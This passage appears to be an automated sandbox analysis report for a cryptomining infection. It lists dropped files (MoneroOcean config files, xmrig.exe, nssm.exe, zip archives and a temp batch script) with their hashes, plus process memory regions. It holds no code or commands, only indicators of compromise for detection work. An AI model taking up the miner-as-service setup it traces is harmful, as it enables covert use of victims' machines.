                                                                                                                                                                                                                                                                                                42f28a6449f12f44f2e25cb018f15e924f951269

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                ce06ac46d1f06692582cbfc526b9ca26f250d6a677c2d4944971467a732ecd0a

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                1039939b082855689e2c004aabb98a42fc93d46f6cdc79bd4451fcc63dc568d81b9e21f86197d63fa3abf9f8075a3bac8333b38f0ef6145baefd69d6605e458d

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j1swvuuy.dbp.ps1
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                60B

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\tmpFE17.tmp.bat
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                14KB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                623f6006f683afdb4b7406e3a4ec35bf

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                f63f03d7338317224726eba368f1a045fa2142d7

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                21d6e0b0e8135a929a77f48e00d286bfa4fc2d749a61529e559b8a5ceb63e47b

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                df7ae1e436be99bbf9ec7fe1fb745c9e2dba6b99e24019b5b1f78786198f1aed465575a829e9b8141bc92f0a4c4269e140228b4335f9fa724a60f1330ad6d3ab

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\moneroocean\config.json
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                725d38d9eeadc9c2691063936b01f9ec

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                153fd5bd55cfd845516562291a7ab867d68145b5

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                0df3cdd812a582b5ddf5c8019fe7aecf03edb5760f4cf2d0c81ba73590a2ec43

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                fe2758ddaa974696c733367d479dc54695ee1f177275f3b26d575b3c27b8c968b6bab0ce1e5b715e6513d1f39d880462b3d8cc542507f2eeae531a9a6d337658

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\moneroocean\config.json
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                64cafb884608c751a2bccaca7c582e0f

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                924f71ecb4903ab63a13a125e62fd6e5f5d20cb2

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                3250e852f2fb3e61bd0642d92f1decac666777da7c4d59d6270ee49fc856151b

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                ddd68d3d13bd65f926f6be67ac891c143d6e282ee955871382452f2627ca42ed54e7363d83651b904cdf8054bc1d12a02becd44ac1b5cdc98ac42fc7ebfe97a0

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\moneroocean\config.json
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                8b25f31750a1bd2a5184de93c2f727c6

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                a12969638354fc5268be07eda6bc4352cc40d488

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                aa99ae2f4627f2d7e2a9c19474248667b8654d02f68cacbb2d644ee6e6de9da4

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                b3d6c24f246d0e2afd58a4dec93007df1afaf70ea3394c03d8d661cf06570b5c6ca0337524f503b2cef113da70b65d482b8d53d77bca4941fc99a2e918f415ca

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\moneroocean\config.json
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                993bb26789d07c6ba3d0483e1697f66b

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                9ccb7876dc4ddb65b2aba03737bc708f231704d5

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                be170c95c392fec2dda13b4f6710cac7e9f2cf1b59d5e0ea9e3ab1906453025b

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                753c77dbcea361b403abd05bd594af8c924b246960b8e9375dcc51d75d47abf08af37eefa2ea3139301cf97c5cd27c71834155f53f00565495f78f01c006dc5a

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\moneroocean\config.json
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                71469039aeadb148b9be6bef59efea0e

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                368aae717236f31850399ff06a973dc7e6dafedf

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                a959d78ed05393b0ee462c47573deb247d69a495e5fb2eb7991c99d60b48bac2

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                fd242b21996fb01f62cd6d23cd899b39890528918cd8fd145c82a4af4069b0278e601536ccecbf9d077a1c6e680a1cad416067878a72a06ea50a6546375f56f9

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\moneroocean\config.json
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                d4f8a13f8c90e2b3b2e7d30a553df39c

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                5c5303ef682ffcd31e57d1abd900ba5b637d51e4

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                68b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\moneroocean\config.json
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                c9ef9c214996db3d88f571226910c5d5

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                420ba30247b1e09f706557a7704a1ebee5d3165c

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                fa55a24dccbf28309642d958cbb73f5053e3a56baa0eda22d4581e0151f5f7c1

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                de91ef4268e67c4fa8d7216637bd9ca69ea33b108352675c954d4719d2d58b9414df78c6ebc8f622fcfbeda4ad5f981c2a17a48f7eeae8626cefe5b6894ec68d

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\moneroocean\nssm.exe
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                360KB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                1136efb1a46d1f2d508162387f30dc4d

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                f280858dcfefabc1a9a006a57f6b266a5d1fde8e

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\moneroocean\xmrig.exe
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                1.8MB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                4de9db45ae9db7d702cd35a8928c8aaa

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                805109edcb6c33ab75ac41fc32b0fc9ad4da8e9a

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                25e66656f553db950faf36b783743a8bd40c208f9560e7e983af3118d68bc673

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                9239baec9fd7aba31cbfa0af06e7b14cf3fef50612d115953491440e577e6dd10736562f36ef3dd27785f6da376c70fefd92871fd531de0d798487bb799460bb

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\moneroocean\xmrig.exe
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                1.4MB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                7bed480cd5ce5565951e41b81df3fd73

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                e3fa51312d95b4558151dcd2f8caa12bf5a7d1c8

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                778b1539eaf4725a60809010e1c8a972e6898924db686fc1767020e52d3db2d0

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                38de64fd2879f3a6c91f7c0b9751a15aecb2a91566fb18184d3206f502b32cd12ea836151f9aaf0bbd3fd2c727af8f1f687099266b95ff3cee871204451dde96

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\moneroocean\xmrig.exe
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                1.6MB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                a50141cfed0ecf3db3c680d844a2a8d6

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                46d6bc6e5e02adc70e193e7e16f533d564eda210

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                93abeb78cc15e2a3998c20feac204a4613b2f4a45839d426f9f884ac85d36d8b

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                6b6c234911bcc02c3ec574c81798e178c1ef15cd950f143eb65f78cc83b1ad2c604b9bd1da606af5a5ee528f0cb5500a507a504dd67a64860169cb670ed904a5

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\nssm.zip
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                135KB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                7ad31e7d91cc3e805dbc8f0615f713c1

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                9f3801749a0a68ca733f5250a994dea23271d5c3

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\xmrig.zip
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                1.9MB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                b67e8edeaa5d2f33691d35e837bc2165

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                7a3d023687502580f91c240a6c96dd0b1c940bbc

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                963f68fe2fbfb4d6c92336ba2a6e2f56a9b141c81df58f9a0d6d8c8857eb34ed

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                3562d530a470bcf32772410b27c03a5516ece56e47793220e1decc7d843b2d2fa4ee3c38cf5e1f4ce5b7ccc0a942ef836d4327cf74c2ca8e3a49f48e229838ab

                                                                                                                                                                                                                                                                                              • memory/1240-206-0x0000000000400000-0x000000000102B000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                12.2MB

                                                                                                                                                                                                                                                                                              • memory/1240-208-0x0000000000400000-0x000000000102B000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                12.2MB

                                                                                                                                                                                                                                                                                              • memory/1240-212-0x0000000000400000-0x000000000102B000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                12.2MB

                                                                                                                                                                                                                                                                                              • memory/1240-211-0x0000000000400000-0x000000000102B000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                12.2MB

                                                                                                                                                                                                                                                                                              • memory/1240-210-0x0000000000400000-0x000000000102B000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                12.2MB

                                                                                                                                                                                                                                                                                              • memory/1240-209-0x0000000000400000-0x000000000102B000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                12.2MB

                                                                                                                                                                                                                                                                                              • memory/1240-207-0x0000000000400000-0x000000000102B000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                12.2MB

                                                                                                                                                                                                                                                                                              • memory/1240-205-0x0000000000400000-0x000000000102B000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                12.2MB

                                                                                                                                                                                                                                                                                              • memory/1240-204-0x0000000000400000-0x000000000102B000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                12.2MB

                                                                                                                                                                                                                                                                                              • memory/1240-201-0x0000000000400000-0x000000000102B000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                12.2MB

                                                                                                                                                                                                                                                                                              • memory/1240-202-0x0000000000400000-0x000000000102B000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                12.2MB

                                                                                                                                                                                                                                                                                              • memory/1240-203-0x0000000000400000-0x000000000102B000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                12.2MB

                                                                                                                                                                                                                                                                                              • memory/2964-200-0x00007FFC3DC90000-0x00007FFC3E751000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                10.8MB

                                                                                                                                                                                                                                                                                              • memory/2964-6-0x000001EE53A40000-0x000001EE53A62000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                136KB

                                                                                                                                                                                                                                                                                              • memory/2964-0-0x00007FFC3DC93000-0x00007FFC3DC95000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                                              • memory/2964-11-0x00007FFC3DC90000-0x00007FFC3E751000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                10.8MB

                                                                                                                                                                                                                                                                                              • memory/2964-12-0x00007FFC3DC90000-0x00007FFC3E751000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                10.8MB

                                                                                                                                                                                                                                                                                              • memory/3592-66-0x0000000000400000-0x000000000102B000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                12.2MB

                                                                                                                                                                                                                                                                                              • memory/3592-65-0x00000000013D0000-0x00000000013F0000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                128KB

                                                                                                                                                                                                                                                                                              • memory/4420-40-0x00000242BB750000-0x00000242BB762000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                72KB

                                                                                                                                                                                                                                                                                              • memory/4420-39-0x00000242BB720000-0x00000242BB72A000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                40KB